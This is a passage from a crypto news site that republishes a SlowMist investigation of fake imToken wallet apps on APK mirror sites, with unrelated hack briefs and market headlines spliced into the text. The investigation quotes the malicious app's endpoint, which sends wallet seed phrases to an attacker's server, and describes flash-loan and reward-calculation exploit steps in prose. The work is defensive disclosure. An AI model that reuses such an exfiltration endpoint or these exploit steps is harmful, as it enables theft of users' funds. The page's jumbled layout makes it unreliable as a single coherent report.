比特幣交易所 比特幣交易所
Ctrl+D 比特幣交易所
ads
首頁 > 比特幣 > Info

慢霧:Web3假錢包第三方源調查分析_TOKEN

Author:

Time:1900/1/1 0:00:00

原文作者:?山&耀

技術的Web3正在驅動下一代技術革命,越來越多的人開始參與到這場加密浪潮中,但Web3與Web2是兩個截然不同的世界。Web3世界是一個充滿著各種各樣的機遇以及危險的黑暗森林,身處Web3世界中,錢包則是進入Web3世界的入口以及通行證。

當你通過錢包在Web3世界中探索體驗諸多的區塊鏈相關應用和網站的過程中,你會發現在一條公鏈上每個應用都是使用錢包“登錄”;這與我們傳統意義上的“登錄”不同,在Web2世界中,每個應用之間的賬戶不全是互通的。但在Web3的世界中,所有應用都是統一使用錢包去進行“登錄”,我們可以看到“登錄”錢包時顯示的不是“LoginwithWallet”,取而代之的是“ConnectWallet”。而錢包是你在Web3世界中的唯一通行證。

慢霧:PREMINT攻擊者共竊取約300枚NFT,總計獲利約280枚ETH:7月18日消息,慢霧監測數據顯示,攻擊PREMINT的兩個黑客地址一共竊取了大約300枚NFT,賣出后總計獲利約280枚ETH。此前報道,黑客在PREMINT網站植入惡意JS文件實施釣魚攻擊,從而盜取用戶的NFT等資產。[2022/7/18 2:19:58]

俗話說高樓之下必有陰影,在如此火熱的Web3世界里,錢包作為入口級應用,自然也被黑灰產業鏈盯上。

在Android環境下,由于很多手機不支持GooglePlay或者因為網絡問題,很多人會從其他途徑下載GooglePlay的應用,比如:apkcombo、apkpure等第三方下載站,這些站點往往標榜自己App是從GooglePlay鏡像下載的,但是其真實安全性如何呢?

慢霧:Ribbon Finance遭遇DNS攻擊,某用戶損失16.5 WBTC:6月24日消息,Ribbon Finance 發推表示遭遇 DNS 攻擊,慢霧MistTrack通過鏈上分析發現攻擊者與今天早前的Convex Finance 攻擊者是同一個,地址 0xb73261481064f717a63e6f295d917c28385af9aa 是攻擊者共用的用來調用惡意合約的錢包地址。同時分析發現,Ribbon Finance某用戶在攻擊中損失了 16.5 WBTC,具體交易為:https://etherscan.io/tx/0xd09057f1fdb3fa97d0ed7e8ebd8fd31dd9a0b5b61a29a22b46985d6217510850。[2022/6/24 1:29:35]

據數據統計站點similarweb統計,apkcombo站點:

慢霧:Inverse Finance遭遇閃電貸攻擊簡析:據慢霧安全團隊鏈上情報,Inverse Finance遭遇閃電貸攻擊,損失53.2445WBTC和99,976.29USDT。慢霧安全團隊以簡訊的形式將攻擊原理分享如下:

1.攻擊者先從AAVE閃電貸借出27,000WBTC,然后存225WBTC到CurveUSDT-WETH-WBTC的池子獲得5,375.5個crv3crypto和4,906.7yvCurve-3Crypto,隨后攻擊者把獲得的2個憑證存入Inverse Finance獲得245,337.73個存款憑證anYvCrv3Crypto。

2.接下來攻擊者在CurveUSDT-WETH-WBTC的池子進行了一次swap,用26,775個WBTC兌換出了75,403,376.18USDT,由于anYvCrv3Crypto的存款憑證使用的價格計算合約除了采用Chainlink的喂價之外還會根據CurveUSDT-WETH-WBTC的池子的WBTC,WETH,USDT的實時余額變化進行計算所以在攻擊者進行swap之后anYvCrv3Crypto的價格被拉高從而導致攻擊者可以從合約中借出超額的10,133,949.1個DOLA。

3.借貸完DOLA之后攻擊者在把第二步獲取的75,403,376.18USDT再次swap成26,626.4個WBTC,攻擊者在把10,133,949.1DOLAswap成9,881,355個3crv,之后攻擊者通過移除3crv的流動性獲得10,099,976.2個USDT。

4.最后攻擊者把去除流動性的10,000,000個USDTswap成451.0個WBT,歸還閃電貸獲利離場。

針對該事件,慢霧給出以下防范建議:本次攻擊的原因主要在于使用了不安全的預言機來計算LP價格,慢霧安全團隊建議可以參考Alpha Finance關于獲取公平LP價格的方法。[2022/6/16 4:32:58]

全球排名:?1,?809?

慢霧:Cover協議被黑問題出在rewardWriteoff具體計算參數變化導致差值:2020年12月29日,慢霧安全團隊對整個Cover協議被攻擊流程進行了簡要分析。

1.在Cover協議的Blacksmith合約中,用戶可以通過deposit函數抵押BPT代幣;

2.攻擊者在第一次進行deposit-withdraw后將通過updatePool函數來更新池子,并使用accRewardsPerToken來記錄累計獎勵;

3.之后將通過_claimCoverRewards函數來分配獎勵并使用rewardWriteoff參數進行記錄;

4.在攻擊者第一次withdraw后還留有一小部分的BPT進行抵押;

5.此時攻擊者將第二次進行deposit,并通過claimRewards提取獎勵;

6.問題出在rewardWriteoff的具體計算,在攻擊者第二次進行deposit-claimRewards時取的Pool值定義為memory,此時memory中獲取的Pool是攻擊者第一次withdraw進行updatePool時更新的值;

7.由于memory中獲取的Pool值是舊的,其對應記錄的accRewardsPerToken也是舊的會賦值到miner;

8.之后再進行新的一次updatePool時,由于攻擊者在第一次進行withdraw后池子中的lpTotal已經變小,所以最后獲得的accRewardsPerToken將變大;

9.此時攻擊者被賦值的accRewardsPerToken是舊的是一個較小值,在進行rewardWriteoff計算時獲得的值也將偏小,但攻擊者在進行claimRewards時用的卻是池子更新后的accRewardsPerToken值;

10.因此在進行具體獎勵計算時由于這個新舊參數之前差值,會導致計算出一個偏大的數值;

11.所以最后在根據計算結果給攻擊者鑄造獎勵時就會額外鑄造出更多的COVER代幣,導致COVER代幣增發。具體accRewardsPerToken參數差值變化如圖所示。[2020/12/29 15:58:07]

國家排名:?7,?370?

品類排名:?168?

我們可以看到它的影響力和流量都非常大。

它默認提供了一款chromeAPK下載插件,我們發現這款插件的用戶數達到了10W:

那么回到我們關注的Web3領域中錢包方向,用戶如果從這里下載的錢包應用安全性如何?

我們拿知名的imToken錢包為例,其GooglePlay的正規下載途徑為:

https://play.google.com/store/apps/details??id=im.token.app

由于很多手機不支持GooglePlay或者因為網絡問題,很多人會從這里下載GooglePlay的應用。

而apkcombo鏡像站的下載路徑為:

https://apkcombo.com/downloader/#package=im.token.app

上圖我們可以發現,apkcombo提供的版本為24.9.11?,經由imToken確認后,這是一個并不存在的版本!證實這是目前市面上假imToken錢包最多的一個版本。

在編寫本文時imToken錢包的最新版本為2.11.3?,此款錢包的版本號很高,顯然是為了偽裝成一個最新版本而設置的。

如下圖,我們在apkcombo上發現,此假錢包版本顯示下載量較大,此處的下載量應該是爬取的GooglePlay的下載量信息,安全起見,我們覺得有必要披露這個惡意App的來源,防止更多的人下載到此款假錢包。

同時我們發現類似的下載站還有如:uptodown

下載地址:https://imtoken.br.uptodown.com/android

我們發現uptodown任意注冊即可發布App,這導致釣魚的成本變得極低:

慢霧:假錢包App已致上萬人被盜,損失高達十三億美元》,所以在此不再贅述。

我們僅對apkcombo提供版本為24.9.11這款假錢包進行分析,在開始界面創建錢包或導入錢包助記詞時,虛假錢包會將助記詞等信息發送到釣魚網站的服務端去,如下圖:

根據逆向APK代碼和實際分析流量包發現,助記詞發送方式:

https://api.funnel.rocks/api/trust??aid=?10&wt=?1&os=?1&key=<助記詞>

看下圖,最早的“api.funnel.rocks”證書出現在2022-06-03?,也就是攻擊開始的大概時間:

俗話說一圖勝千言,最后我們畫一個流程圖:

交易所時請認準官方下載渠道并從多方進行驗證;如果你的錢包從上述鏡像站下載,請第一時間轉移資產并卸載該軟件,必要時可通過官方驗證通道核實。

同時,如需使用錢包,請務必認準以下主流錢包App官方網址:

1?/imToken錢包:https://token.im/

2?/TokenPocket錢包:https://www.tokenpocket.pro/

3?/TronLink錢包:https://www.tronlink.org/

4?/比特派錢包:https://bitpie.com/

5?/MetaMask錢包:https://metamask.io/

6?/TrustWallet:https://trustwallet.com/

請持續關注慢霧安全團隊,更多Web3安全風險分析與告警正在路上。

致謝:感謝在溯源過程中imToken官方提供的驗證支持。

由于保密性和隱私性,本文只是冰山一角。慢霧在此建議,用戶需加強對安全知識的了解,進一步強化甄別網絡釣魚攻擊的能力等,避免遭遇此類攻擊。更多的安全知識建議閱讀慢霧出品的《區塊鏈黑暗森林自救手冊》。

Tags:KENTOKETOKENTOKcrosswayglobaltokenimtoken下載安裝iosVANCAT Egg TokenuGAS-JUN21 Token Expiring 30 Jun 2021

比特幣
由于戲劇取悅比特幣多頭,BTC價格上漲 6%_USD

隨著BTC價格軋空再次成為可能,比特幣繼續受益于美國銀行穩定性的緊張情緒。比特幣在隔夜上漲標志著穩固反彈之后,4月26日升向29,000美元.

1900/1/1 0:00:00
ARB迎來復蘇-ARB多頭能否突破1.4200美元的關口_ARB

ARB獲得1.300美元的支撐并實現反彈。但除非BTC收回29,000美元并清除障礙,否則上漲勢頭懸而未決。價格走勢接近阻力的關鍵匯合點。更多的空頭頭寸被清算,CVD增加,增強了買家的杠桿作用.

1900/1/1 0:00:00
UNI 進入超賣狀態,依然看跌?_UDO

UNI進入超賣狀態聚集的CVD斑點增長;更多的多頭頭寸清算。Uniswap跌至5.24美元至5.5美元的關鍵需求區域,如果資產在該水平出現更激進的買盤,可能會影響賣家.

1900/1/1 0:00:00
Gate.io 結構化理財 5 款產品上架,現在認購,即刻賺取最高 15 % 年化_HTT

Gate.io上架,其中包括BTC&USDT&ETH等不同幣種產品。作為保本理財產品,Gate.io旗下結構化產品為用戶提供最高15%的年化收益.

1900/1/1 0:00:00
“加密冬天”已經結束?比特幣和這些山寨幣值得關注_USDT

比特幣和部分山寨幣有可能跌破各自的支撐位并開始更深層次的修正。比特幣過去三天設法保持在27,000美元以上,但上周9%的損失嚇壞了一些新手交易員.

1900/1/1 0:00:00
Trust Wallet驚爆漏洞,做過這件事錢包恐被盜_WAL

知名加密貨幣錢包TrustWallet發布一則名為《WASM漏洞、事件更新和建議措施》的官方公告,揭露錢包潛在漏洞,據悉已有17萬美元用戶資產遭盜,還有8.8萬美元正在曝險.

1900/1/1 0:00:00
ads